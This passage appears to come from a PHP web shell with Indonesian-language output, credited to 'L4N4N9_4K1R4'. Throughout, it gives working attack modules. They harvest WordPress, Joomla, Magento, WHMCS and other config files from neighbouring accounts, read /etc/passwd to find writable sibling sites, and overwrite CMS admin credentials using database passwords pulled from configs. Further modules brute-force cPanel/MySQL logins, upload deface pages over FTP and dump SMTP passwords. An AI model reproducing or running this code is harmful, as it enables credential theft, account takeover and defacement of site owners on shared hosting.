"WHMCS",\r\n\t\t\t\t\t\t\t"$user_config_dir/whm/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t\t"$user_config_dir/whmcs/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t\t"$user_config_dir/forum/config.php" => "phpBB",\r\n\t\t\t\t\t\t\t"$user_config_dir/sites/default/settings.php" => "Drupal",\r\n\t\t\t\t\t\t\t"$user_config_dir/config/settings.inc.php" => "PrestaShop",\r\n\t\t\t\t\t\t\t"$user_config_dir/app/etc/local.xml" => "Magento",\r\n\t\t\t\t\t\t\t"$user_config_dir/joomla/configuration.php" => "Joomla",\r\n\t\t\t\t\t\t\t"$user_config_dir/configuration.php" => "Joomla",\r\n\t\t\t\t\t\t\t"$user_config_dir/wp/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t\t"$user_config_dir/wordpress/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t\t"$user_config_dir/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t\t"$user_config_dir/admin/config.php" => "OpenCart",\r\n\t\t\t\t\t\t\t"$user_config_dir/slconfig.php" => "Sitelok",\r\n\t\t\t\t\t\t\t"$user_config_dir/application/config/database.php" => "Ellislab");\r\n\t\t\t\t\t\tforeach($grab_config as $config => $nama_config) {\r\n\t\t\t\t\t\t\t$ambil_config = file_get_contents($config);\r\n\t\t\t\t\t\t\tif($ambil_config == \'\') {\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");\r\n\t\t\t\t\t\t\t\tfputs($file_config,$ambil_config);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\t\t\r\n\t\t\t\t}\r\n\t\t\t}\t\r\n\t\t}\r\n\techo "
Done
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'jumping\') {\r\n\t$i = 0;\r\n\techo "
";\r\n\tif(preg_match("/hsphere/", $dir)) {\r\n\t\t$urls = explode("\\r\\n", $_POST[\'url\']);\r\n\t\tif(isset($_POST[\'jump\'])) {\r\n\t\t\techo "
";\r\n\t\t\tforeach($urls as $url) {\r\n\t\t\t\t$url = str_replace(array("http://","www."), "", strtolower($url));\r\n\t\t\t\t$etc = "/etc/passwd";\r\n\t\t\t\t$f = fopen($etc,"r");\r\n\t\t\t\twhile($gets = fgets($f)) {\r\n\t\t\t\t\t$pecah = explode(":", $gets);\r\n\t\t\t\t\t$user = $pecah[0];\r\n\t\t\t\t\t$dir_user = "/hsphere/local/home/$user";\r\n\t\t\t\t\tif(is_dir($dir_user) === true) {\r\n\t\t\t\t\t\t$url_user = $dir_user."/".$url;\r\n\t\t\t\t\t\tif(is_readable($url_user)) {\r\n\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\t$jrw = "[R] $url_user";\r\n\t\t\t\t\t\t\tif(is_writable($url_user)) {\r\n\t\t\t\t\t\t\t\t$jrw = "[RW] $url_user";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo $jrw."
";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\techo "
Total ada ".$i." Kamar di ".$ip;\r\n\t\t}\r\n\t\techo "
";\r\n\t\t} else {\r\n\t\t\techo \'
\r\n\t\t\t\t
\r\n\t\t\t\t List Domains:
\r\n\t\t\t\t
\r\n\t\t\t\t \r\n\t\t\t\t
\';\r\n\t\t}\r\n\t} elseif(preg_match("/vhosts|vhost/", $dir)) {\r\n\t\tpreg_match("/\\/var\\/www\\/(.*?)\\//", $dir, $vh);\r\n\t\t$urls = explode("\\r\\n", $_POST[\'url\']);\r\n\t\tif(isset($_POST[\'jump\'])) {\r\n\t\t\techo "
";\r\n\t\t\tforeach($urls as $url) {\r\n\t\t\t\t$url = str_replace("www.", "", $url);\r\n\t\t\t\t$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";\r\n\t\t\t\tif(is_dir($web_vh) === true) {\r\n\t\t\t\t\tif(is_readable($web_vh)) {\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t$jrw = "[R] $web_vh";\r\n\t\t\t\t\t\tif(is_writable($web_vh)) {\r\n\t\t\t\t\t\t\t$jrw = "[RW] $web_vh";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo $jrw."
";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\techo "
Total ada ".$i." Kamar di ".$ip;\r\n\t\t}\r\n\t\techo "
";\r\n\t\t} else {\r\n\t\t\techo \'
\r\n\t\t\t\t
\r\n\t\t\t\t List Domains:
\r\n\t\t\t\t
\r\n\t\t\t\t \r\n\t\t\t\t
\';\r\n\t\t}\r\n\t} else {\r\n\t\techo "
";\r\n\t\t$etc = fopen("/etc/passwd", "r") or die("Can\'t read /etc/passwd");\r\n\t\twhile($passwd = fgets($etc)) {\r\n\t\t\tif($passwd == \'\' || !$etc) {\r\n\t\t\t\techo "Can\'t read /etc/passwd";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n\t\t\t\tforeach($user_jumping[1] as $user_idx_jump) {\r\n\t\t\t\t\t$user_jumping_dir = "/home/$user_idx_jump/public_html";\r\n\t\t\t\t\tif(is_readable($user_jumping_dir)) {\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t$jrw = "[R] $user_jumping_dir";\r\n\t\t\t\t\t\tif(is_writable($user_jumping_dir)) {\r\n\t\t\t\t\t\t\t$jrw = "[RW] $user_jumping_dir";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo $jrw;\r\n\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t$domain_jump = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\tif($domain_jump == \'\') {\r\n\t\t\t\t\t\t\t\techo " => ( gabisa ambil nama domain nya )
";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n\t\t\t\t\t\t\t\tforeach($domains_jump[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t$user_jumping_url = $user_jumping_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\tif($user_jumping_url == $user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\t\techo " => ( $dj )
";\r\n\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo "
";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\techo "
Total ada ".$i." Kamar di ".$ip;\r\n\t\t}\r\n\t\techo "
";\r\n\t}\r\n\techo "
"; } if($_GET[\'do\'] == \'hash\') {\r\n$submit= $_POST[\'enter\'];\r\nif (isset($submit)) {\r\n$pass = $_POST[\'password\']; // password\r\n$salt = \'}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN\'; // random string\r\n$hash = md5($pass); // md5 hash #1\r\n$md4 = hash("md4",$pass);\r\n$hash_md5 = md5($salt.$pass); // md5 hash with salt #2\r\n$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3\r\n$hash1 = sha1($pass); // sha1 hash #4\r\n$sha256 = hash("sha256",$text);\r\n$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5\r\n$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6\r\n}\r\necho \'
\';\r\necho \'\';\r\necho \'\';\r\necho \'
\';\r\necho \'\';\r\necho \'

\';\r\necho \'

\';\r\necho \'

\';\r\necho \'

\';\r\necho \'

\';\r\necho \'

\';\r\necho \'

\';\r\necho \'

\';\r\necho \'

Password Hash
masukan kata yang ingin di encrypt:\';\r\necho \'\';\r\necho \'
Hasil Hash
Original Password
MD5
MD4
MD5 with Salt
MD5 with Salt & Sha1
Sha1
Sha256
Sha1 with Salt
Sha1 with Salt & MD5
\'; \r\n} elseif($_GET[\'do\'] == \'auto_edit_user\') {\r\n\tif($_POST[\'hajar\']) {\r\n\t\tif(strlen($_POST[\'pass_baru\']) < 6 OR strlen($_POST[\'user_baru\']) < 6) {\r\n\t\t\techo "username atau password harus lebih dari 6 karakter";\r\n\t\t} else {\r\n\t\t\t$user_baru = $_POST[\'user_baru\'];\r\n\t\t\t$pass_baru = md5($_POST[\'pass_baru\']);\r\n\t\t\t$conf = $_POST[\'config_dir\'];\r\n\t\t\t$scan_conf = scandir($conf);\r\n\t\t\tforeach($scan_conf as $file_conf) {\r\n\t\t\t\tif(!is_file("$conf/$file_conf")) continue;\r\n\t\t\t\t$config = file_get_contents("$conf/$file_conf");\r\n\t\t\t\tif(preg_match("/JConfig|joomla/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"host = \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"user = \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"password = \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"db = \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"dbprefix = \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[\'id\'];\r\n\t\t\t\t\t$site = ambilkata($config,"sitename = \'","\'");\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => Joomla
";\r\n\t\t\t\t\tif($site == \'\') {\r\n\t\t\t\t\t\techo "Sitename => error, gabisa ambil nama domain nya
";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Sitename => $site
";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/WordPress/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[ID];\r\n\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => $target/wp-login.php
";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user_baru\',user_pass=\'$pass_baru\' WHERE id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => Wordpress
";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"");\r\n\t\t\t\t\t$dbname = ambilkata($config,"");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"");\r\n\t\t\t\t\t$prefix = $dbprefix."admin_user";\r\n\t\t\t\t\t$option = $dbprefix."core_config_data";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[user_id];\r\n\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option WHERE path=\'web/secure/base_url\'");\r\n\t\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t\t$target = $result2[value];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => $target/admin/
";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => Magento
";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"\'DB_HOSTNAME\', \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"\'DB_USERNAME\', \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"\'DB_PASSWORD\', \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"\'DB_DATABASE\', \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"\'DB_PREFIX\', \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."user";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[user_id];\r\n\t\t\t\t\t$target = ambilkata($config,"HTTP_SERVER\', \'","\'");\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => $target
";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => OpenCart
";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,\'server = "\',\'"\');\r\n\t\t\t\t\t$dbuser = ambilkata($config,\'username = "\',\'"\');\r\n\t\t\t\t\t$dbpass = ambilkata($config,\'password = "\',\'"\');\r\n\t\t\t\t\t$dbname = ambilkata($config,\'database = "\',\'"\');\r\n\t\t\t\t\t$prefix = "users";\r\n\t\t\t\t\t$option = "identitas";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$target = $result[alamat_website];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$target2 = $result[url];\r\n\t\t\t\t\t\t$url_target = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t\tif($target2 == \'\') {\r\n\t\t\t\t\t\t\t$url_target2 = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$cek_login3 = file_get_contents("$target2/adminweb/");\r\n\t\t\t\t\t\t\t$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");\r\n\t\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => $target2/adminweb
";\r\n\t\t\t\t\t\t\t} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => $target2/lokomedia/adminweb
";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$cek_login = file_get_contents("$target/adminweb/");\r\n\t\t\t\t\t\t$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");\r\n\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {\r\n\t\t\t\t\t\t\t$url_target = "Login => $target/adminweb
";\r\n\t\t\t\t\t\t} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {\r\n\t\t\t\t\t\t\t$url_target = "Login => $target/lokomedia/adminweb
";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$url_target = "Login => $target [ gatau admin login nya dimana :p ]
";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE level=\'admin\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => Lokomedia
";\r\n\t\t\t\t\tif(preg_match(\'/error, gabisa ambil nama domain nya/\', $url_target)) {\r\n\t\t\t\t\t\techo $url_target2;\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo $url_target;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "
\r\n\t\t

Auto Edit User Config

\r\n\t\t\r\n\t\tDIR Config:
\r\n\t\t

\r\n\t\tSet User & Pass:
\r\n\t\t
\r\n\t\t
\r\n\t\t\r\n\t\t\r\n\t\tNB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
\r\n\t\t";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'cpanel\') {\r\n\tif($_POST[\'crack\']) {\r\n\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\r\n\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\r\n\t\t$i = 0;\r\n\t\tforeach($usercp as $ucp) {\r\n\t\t\tforeach($passcp as $pcp) {\r\n\t\t\t\tif(@mysql_connect(\'localhost\', $ucp, $pcp)) {\r\n\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$_SESSION[$ucp] = "1";\r\n\t\t\t\t\t\t$_SESSION[$pcp] = "1";\r\n\t\t\t\t\t\tif($ucp == \'\' || $pcp == \'\') {\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t\t$domain_cp = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\t\tif($domain_cp == \'\') {\r\n\t\t\t\t\t\t\t\t\t$dom = "gabisa ambil nama domain nya";\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);\r\n\t\t\t\t\t\t\t\t\tforeach($domains_cp[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t\t$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t\t$user_cp_url = $user_cp_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\t\tif($user_cp_url == $ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t$dom = "$dj";\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$dom = "function is Disable by system";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo "username ($ucp) password ($pcp) domain ($dom)
";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) {\r\n\t\t} else {\r\n\t\t\techo "
sukses nyolong ".$i." Cpanel by L4N4N9_4K1R4.";\r\n\t\t}\r\n\t} else {\r\n\t\techo "
\r\n\t\t
\r\n\t\tUSER:
\r\n\t\t
\r\n\t\tPASS:
\r\n\t\t
\r\n\t\t\r\n\t\t
\r\n\t\tNB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'cpftp_auto\') {\r\n\tif($_POST[\'crack\']) {\r\n\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\r\n\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\r\n\t\t$i = 0;\r\n\t\tforeach($usercp as $ucp) {\r\n\t\t\tforeach($passcp as $pcp) {\r\n\t\t\t\tif(@mysql_connect(\'localhost\', $ucp, $pcp)) {\r\n\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$_SESSION[$ucp] = "1";\r\n\t\t\t\t\t\t$_SESSION[$pcp] = "1";\r\n\t\t\t\t\t\tif($ucp == \'\' || $pcp == \'\') {\r\n\t\t\t\t\t\t\t//\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo "[+] username ($ucp) password ($pcp)
";\r\n\t\t\t\t\t\t\t$ftp_conn = ftp_connect($ip);\r\n\t\t\t\t\t\t\t$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);\r\n\t\t\t\t\t\t\tif((!$ftp_login) || (!$ftp_conn)) {\r\n\t\t\t\t\t\t\t\techo "[+] Login Gagal

";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\techo "[+] Login Sukses
";\r\n\t\t\t\t\t\t\t\t$fi = htmlspecialchars($_POST[\'file_deface\']);\r\n\t\t\t\t\t\t\t\t$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST[\'deface\'], FTP_BINARY);\r\n\t\t\t\t\t\t\t\tif($deface) {\r\n\t\t\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\t\t\techo "[+] Deface Sukses
";\r\n\t\t\t\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t\t\t\t$domain_cp = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\t\t\t\tif($domain_cp == \'\') {\r\n\t\t\t\t\t\t\t\t\t\t\techo "[+] gabisa ambil nama domain nya

";\r\n\t\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);\r\n\t\t\t\t\t\t\t\t\t\t\tforeach($domains_cp[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t\t\t\t$user_cp_url = $user_cp_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\t\t\t\tif($user_cp_url == $ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\techo "[+] http://$dj/$fi

";\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\techo "[+] gabisa ambil nama domain nya

";\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\techo "[-] Deface Gagal

";\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t//echo "username ($ucp) password ($pcp)
";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) {\r\n\t\t} else {\r\n\t\t\techo "
sukses deface ".$i." Cpanel by L4N4N9_4K1R4";\r\n\t\t}\r\n\t} else {\r\n\t\techo "
\r\n\t\t
\r\n\t\tFilename:
\r\n\t\t
\r\n\t\tDeface Page:
\r\n\t\t
\r\n\t\tUSER:
\r\n\t\t
\r\n\t\tPASS:
\r\n\t\t
\r\n\t\t\r\n\t\t
\r\n\t\tNB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'smtp\') {\r\n\techo "
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

";\r\n\tfunction scj($dir) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t$ambil = str_replace("$", "", $ambil);\r\n\t\t\tif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t$smtp_host = ambilkata($ambil,"smtphost = \'","\'");\r\n\t\t\t\t$smtp_auth = ambilkata($ambil,"smtpauth = \'","\'");\r\n\t\t\t\t$smtp_user = ambilkata($ambil,"smtpuser = \'","\'");\r\n\t\t\t\t$smtp_pass = ambilkata($ambil,"smtppass = \'","\'");\r\n\t\t\t\t$smtp_port = ambilkata($ambil,"smtpport = \'","\'");\r\n\t\t\t\t$smtp_secure = ambilkata($ambil,"smtpsecure = \'","\'");\r\n\t\t\t\techo "SMTP Host: $smtp_host
";\r\n\t\t\t\techo "SMTP port: $smtp_port
";\r\n\t\t\t\techo "SMTP user: $smtp_user
";\r\n\t\t\t\techo "SMTP pass: $smtp_pass
";\r\n\t\t\t\techo "SMTP auth: $smtp_auth
";\r\n\t\t\t\techo "SMTP secure: $smtp_secure

